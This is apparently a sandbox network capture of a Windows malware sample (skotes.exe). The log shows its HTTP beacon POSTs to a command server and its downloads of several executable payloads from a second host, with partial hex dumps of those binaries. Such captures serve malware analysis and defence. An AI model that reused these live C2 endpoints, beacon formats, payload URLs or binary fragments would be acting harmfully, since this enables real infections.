00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 30 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%\|^0J@`JH@Vjl <@.rsrclL@.idata T@ )V@hbzcjodo00(X@irlgpdtj J@.taggant00J"@
Dec 18, 2024 13:38:11.076180935 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:11.076200008 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:11.076364994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:11.076378107 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:11.076390982 CET	672	IN	Data Raw: e2 b4 64 ec d7 19 5e d5 5b 81 d4 f0 bf cb ae bb 6c 0f 5e aa 30 f2 da f3 d1 b8 b5 f0 e5 cf f0 d3 71 c5 be 43 ac 44 e4 f9 0f 39 2f d0 8a 54 d5 8b 24 d1 f6 00 3d 72 72 d3 4c e4 51 97 62 db d5 78 33 9d d8 ed 9c a8 0f a0 97 ec 8e 8e bb 25 18 09 9b 7c Data Ascii: d^[l^0qCD9/T$=rrLQbx3%\|IU^eC}a>~oADwrG&[>+Iq1R/-=D:1(\|GT d>Cf/xMTG<l [Ku$x@-
Dec 18, 2024 13:38:11.076761007 CET	1236	IN	Data Raw: 2a 21 5e 6f 60 f9 2f 3f 1e cc f1 8e 5e 82 18 66 c0 8c b6 97 89 5a f9 34 ab d5 21 fe 89 4a 0e 04 4b f6 8f 34 45 cb f7 2b 36 13 cc 2d 27 26 a2 6f 4c 02 48 f0 8b 1b 34 89 81 47 0a fc d8 29 be bd 23 0b 56 33 62 cd 96 33 dd a9 be 91 cf e7 16 f5 43 88 Data Ascii: !^o`/?^fZ4!JK4E+6-'&oLH4G)#V3b3C,Brq-o+_KU'yK~P#3m;tmzuHuHA{S\=wGstTk/BdnHo1]/EFJ<
Dec 18, 2024 13:38:11.076775074 CET	1236	IN	Data Raw: 5d 0e 0e d4 05 f6 2b 07 49 41 50 71 5e 73 a4 9f 2c 91 ae e2 3c b6 fe 58 4b 37 10 9f 97 db 49 7e e3 90 f6 e8 a3 54 0f 9e 33 4f 2f ef 9b d1 98 91 6f cd 56 67 0b 72 f9 04 5c d5 53 ad 09 95 0e 49 5b f6 d0 cd 2d 65 e6 89 56 13 93 39 02 a4 a2 6f b1 60 Data Ascii: ]+IAPq^s,<XK7I~T3O/oVgr\SI[-eV9o`opG&{V^U\C%ioj*bAr WY'iGO35pU&u&\|\[#)//n,4B\S4W}GP[kuyk ,
Dec 18, 2024 13:38:11.076788902 CET	1236	IN	Data Raw: 1e 4e 8e 8e 03 13 18 60 82 88 3c 99 94 6e f9 47 3e d2 70 d6 88 1b 5e a1 e9 ec 74 f3 43 8c 9e 85 1d 12 c4 cd 4d 52 0e 39 61 82 d6 c9 54 4f f9 e5 86 d5 53 ec 9c 75 0e 88 84 f6 84 2b cc 75 a1 41 34 03 5a 68 2a 5a 93 6c 91 0f cd 1e 26 66 37 af ef db Data Ascii: N`<nG>p^tCMR9aTOSu+uA4ZhZl&f7xL:^cF&!KYG&S{Rxa^2CxqlVAoBtG&u<6o3kjk'dG_!T;;~MeHgxpzfdNxm&56/
Dec 18, 2024 13:38:11.076802015 CET	672	IN	Data Raw: b1 93 74 9e 8b de 39 0d 6e 47 26 c6 a8 4e 9b a7 cd 7d bc 2d c2 cb 61 ae 05 de 5e e3 6c 87 92 f3 43 a5 52 03 57 13 ac de 8e 78 a2 7c 61 96 7a 01 8d 16 52 33 bc dc 3a e7 3c 91 80 6b 9d a4 2e c7 6b 62 38 d0 85 3a 1a 4a d6 ab 09 48 be e4 67 33 12 cf Data Ascii: t9nG&N}-a^lCRWx\|azR3:<k.kb8:JHg3hu0iLYc+Jg?kLk,dC(OUA3/>HE{3A3y>R-*C!P:tkds)m^b&\|1l:3SQoX2[G&R5
Dec 18, 2024 13:38:11.195729971 CET	1236	IN	Data Raw: 54 8a 01 48 13 6d 91 31 1f d7 48 1d bb df 9f db 32 7b 78 7f c6 e4 3f c2 28 54 5d 5c 53 47 f6 2d 23 26 75 1d 4c 60 07 70 c5 03 6a 38 29 69 57 6f 5a dd 4c 1d 1e e8 d9 8e af 3b 18 9e 64 21 97 97 d5 50 f9 11 46 d5 0a c5 fa d0 0e 6a 04 f6 c2 51 47 7f Data Ascii: THm1H2{x?(T]\SG-#&uL`pj8)iWoZL;d!PFjQG84mdWkN3I}D1C07JZ8kOjt`ou\|^xC!fOA8mNk5/=&iPP^hCL\|o4Zl4~`v+T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49709	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:16.721292019 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016894001&unit=246122658369
Dec 18, 2024 13:38:18.054625034 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49710	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:18.178359985 CET	59	OUT	GET /files/dodo/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 18, 2024 13:38:19.504157066 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:19 GMT Content-Type: application/octet-stream Content-Length: 765568 Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT Connection: keep-alive ETag: "67614868-bae80" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
Dec 18, 2024 13:38:19.504312038 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:19.504323006 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:19.504471064 CET	1236	IN	Data Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;\|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
Dec 18, 2024 13:38:19.504484892 CET	1236	IN	Data Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44 Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w\|$ D$$WUS`K
Dec 18, 2024 13:38:19.504498005 CET	1236	IN	Data Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f Data Ascii: RWhABV?VD$t$p0A^WV\|$(AA1NNOPQEAGONFA^_WV\|$(AA1NNOPQDAGONF\A^_WV\|$(AA1NNOPQDAG
Dec 18, 2024 13:38:19.504807949 CET	1236	IN	Data Raw: 89 43 0c 89 7b 1c 8b 4d cc 89 4b 20 47 57 ff 75 c8 50 e8 30 57 00 00 83 c4 0c 8b 45 08 89 43 04 8b 45 0c 89 43 08 8d 7d d8 89 3b e8 9f 00 00 00 83 c4 24 8b 65 c4 83 7f 14 10 72 03 8b 7d d8 c7 06 28 c1 41 00 8d 46 04 31 c9 89 4e 08 89 4e 04 8d 4d Data Ascii: C{MK GWuP0WECEC};$er}(AF1NNM9APQ>@AEr,MxrQ) s>$WQAEFEFM1e^_[]USWV\|$0WB1D$t$<~t
Dec 18, 2024 13:38:19.504842043 CET	1236	IN	Data Raw: e0 89 44 24 04 8b 39 85 ff 75 26 89 ce 89 e1 6a 00 e8 f6 07 00 00 83 3e 00 75 0d a1 80 65 42 00 40 a3 80 65 42 00 89 06 89 e1 e8 0e 08 00 00 8b 3e 8b 4c 24 04 31 e1 e8 bd 04 00 00 89 f8 83 c4 08 5e 5f c3 cc 57 56 8b 7c 24 0c 8b 41 04 39 78 0c 76 Data Ascii: D$9u&j>ueB@eB>L$1^_WV\|$A9xvH4u1xtf9xv@4^_SWV8\$HWB1D$4t\;uW\|$LjGtHESBP_FAPb#3
Dec 18, 2024 13:38:19.504854918 CET	1236	IN	Data Raw: 20 c6 41 00 74 0a 6a 0c 56 e8 d8 ff ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 5d e9 91 ff ff ff e9 bc ff ff ff 3b 0d c0 57 42 00 75 01 c3 e9 95 21 00 00 55 8b ec 56 57 bf 8c 64 42 00 57 ff 15 30 39 42 00 8b 75 08 83 3e 00 75 0c 83 0e ff eb 26 e8 Data Ascii: AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_^]UVdBV09BWBEAWBVd,dBWB0:BhdBh:B^]jjhdBhdBL:BUu
Dec 18, 2024 13:38:19.504868984 CET	1236	IN	Data Raw: 00 74 08 ff 33 e8 a3 96 00 00 59 83 23 00 85 ff 74 2a 80 3f 00 56 8b f7 74 06 46 80 3e 00 75 fa 2b f7 46 56 e8 f6 9a 00 00 89 03 59 85 c0 74 0b 56 57 50 e8 93 48 00 00 83 c4 0c 5e 5f 8b c3 5b 5d c2 04 00 56 8b f1 56 c7 06 28 c6 41 00 e8 3f 00 00 Data Ascii: t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEYtuw3UQQSWjMExXt?VOEt,p7BMEtj17BMu^3
Dec 18, 2024 13:38:19.625646114 CET	1236	IN	Data Raw: 8b ec 8b 55 0c 83 fa 0f 76 3c 80 3d e5 cd 41 00 00 74 33 8b 4d 10 83 c2 08 56 8b 75 14 41 57 8b 7d 08 46 03 d7 03 cf 83 e2 f8 03 f7 3b ca 8b c2 0f 46 c1 3b f2 0f 47 f2 56 50 52 57 e8 fa 04 00 00 83 c4 10 5f 5e 5d c3 e9 d0 00 00 00 55 8b ec 51 53 Data Ascii: Uv<=At3MVuAW}F;F;GVPRW_^]UQS]VWMw+u;Bv++MAQPRlCVu?w_^[UQSW_;_s$VsVSw^v?EDuuj_[UM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49711	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:23.429595947 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016895001&unit=246122658369
Dec 18, 2024 13:38:24.917543888 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49712	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:25.150208950 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 18, 2024 13:38:26.434148073 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:26 GMT Content-Type: application/octet-stream Content-Length: 776832 Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT Connection: keep-alive ETag: "6761482a-bda80" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
Dec 18, 2024 13:38:26.434204102 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:26.434240103 CET	1236	IN	Data Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24 Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"\|$$D$(WVt$VfSCErPPD$\|$$l$(WVPe\$Dl$t$h5Vm
Dec 18, 2024 13:38:26.434465885 CET	672	IN	Data Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35 Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
Dec 18, 2024 13:38:26.434480906 CET	1236	IN	Data Raw: 00 00 00 00 c7 04 24 00 00 00 00 ff 34 24 ff 74 24 08 e8 34 fd ff ff 83 c4 08 8b 4c 24 28 31 e1 e8 90 11 00 00 b0 01 83 c4 2c 5e 5f 5b 5d c3 e8 1b 00 00 00 e8 1e 9c 00 00 c7 05 70 64 42 00 00 00 00 00 c3 c7 05 74 64 42 00 00 00 00 00 c3 68 2d 03 Data Ascii: $4$t$4L$(1,^_[]pdBtdBh-BfD$s#PH#A@@B$AhLABPBVD$(A1VVQPG$A^VD$(A1VVQP
Dec 18, 2024 13:38:26.434672117 CET	1236	IN	Data Raw: 11 46 04 c7 46 0c 00 00 00 00 6a 20 e8 5c 0c 00 00 83 c4 04 89 c7 89 06 c7 46 10 15 00 00 00 c7 46 14 1f 00 00 00 0f 10 05 f4 c1 41 00 0f 11 00 f2 0f 10 05 01 c2 41 00 f2 0f 11 40 0d 83 c7 15 e9 8f 00 00 00 50 e8 00 14 00 00 83 c4 04 89 c3 0f 57 Data Ascii: FFj \FFAA@PWWFP7xxw~FWSVYI$CCrPP~^Wt$PY^_[]D$T$
Dec 18, 2024 13:38:26.434686899 CET	1236	IN	Data Raw: df 01 cf b8 00 00 00 80 be ff ff ff 7f 89 14 24 78 18 89 d1 d1 e9 89 ca 81 f2 ff ff ff 7f 3b 14 24 8b 14 24 0f 83 dd 00 00 00 50 e8 81 f6 ff ff 8b 54 24 04 83 c4 04 89 7d 10 89 75 14 83 fa 10 0f 82 8d 00 00 00 8b 7d 00 53 57 50 89 c6 e8 34 55 00 Data Ascii: $x;$$PT$}u}SWP4Ut$D$ Pt$ SUt$D$ NrG) $QW*\|$K<}ruQt$ ST>(SUPTt$ Vt$ ST
Dec 18, 2024 13:38:26.434919119 CET	1236	IN	Data Raw: 46 1c 85 c0 74 09 50 e8 89 9e 00 00 83 c4 04 c7 46 1c 00 00 00 00 8b 46 14 85 c0 74 09 50 e8 72 9e 00 00 83 c4 04 c7 46 14 00 00 00 00 8b 46 0c 85 c0 74 09 50 e8 5b 9e 00 00 83 c4 04 c7 46 0c 00 00 00 00 8b 46 04 85 c0 74 09 50 e8 44 9e 00 00 83 Data Ascii: FtPFFtPrFFtP[FFtPDF^VA\|$tVw^A1IDSWV\$t$9tWP F9u^_[D$QP SWV\$t$9t
Dec 18, 2024 13:38:26.434984922 CET	1236	IN	Data Raw: e8 53 24 00 00 85 c0 74 20 64 a1 18 00 00 00 be 98 64 42 00 8b 50 04 eb 04 3b d0 74 10 33 c0 8b ca f0 0f b1 0e 85 c0 75 f0 32 c0 5e c3 b0 01 5e c3 55 8b ec e8 1f 24 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 98 64 42 00 87 01 5d c3 55 8b ec 83 Data Ascii: S$t ddBP;t3u2^^U$t}u3dB]U}udB 5u2]Zuj5Y]U=dBt}uuZu~5YY]U=dBt]Vutub#t&u"hdB}YuhdB}Y
Dec 18, 2024 13:38:26.434998989 CET	1236	IN	Data Raw: e8 aa fe ff ff 8b f8 57 e8 61 00 00 00 59 59 68 c8 0d 42 00 8d 4f 18 c7 47 10 3f 00 00 00 e8 0d fe ff ff 8b 0f 8b 71 04 8b ce ff 15 10 37 42 00 8b cf ff d6 89 3d a0 65 42 00 90 89 3d 84 65 42 00 80 7d 08 00 74 11 8b 07 8b 70 04 8b ce ff 15 10 37 Data Ascii: WaYYhBOG?q7B=eB=eB}tp7BMu"eBU=eBuh1@eBT!YEeB]UEW8t+Vp7Btj17B^_]UQjMheB%eBYM
Dec 18, 2024 13:38:26.553807974 CET	1236	IN	Data Raw: 53 53 89 5e 30 89 5e 08 89 5e 10 c7 46 18 06 00 00 00 89 5e 1c 89 5e 20 89 5e 24 89 5e 28 89 5e 2c e8 87 e5 ff ff 6a 08 e8 1c f4 ff ff 8b f8 59 85 ff 74 10 6a 01 89 5d fc e8 c9 fa ff ff 59 89 47 04 eb 02 8b fb 89 7e 30 e8 f3 1d 00 00 c3 cc cc cc Data Ascii: SS^0^^F^^ ^$^(^,jYtj]YG~0UjhAdPVWB3PEdeVlAEYtj8VYYMdY^UuYu2]E]UuEPYY]Ujh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49714	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:30.380966902 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 38 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016896001&unit=246122658369
Dec 18, 2024 13:38:31.731475115 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49715	31.41.244.11	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:38:31.856322050 CET	62	OUT	GET /files/unique1/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 18, 2024 13:38:33.203787088 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:38:32 GMT Content-Type: application/octet-stream Content-Length: 4471808 Last-Modified: Wed, 18 Dec 2024 11:58:29 GMT Connection: keep-alive ETag: "6762b8e5-443c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 40 b6 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 b6 00 00 04 00 00 49 72 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 1e b6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 1e b6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU`g(>D.d2@PD@pIrD@ _asaX pa>(@.rsrcaN(@.idata aP(@ 8aR(@pxmrbptw`T(@trmdtetf0D@.taggant0@"D@
Dec 18, 2024 13:38:33.203897953 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:33.203908920 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:33.204118013 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 18, 2024 13:38:33.204236984 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
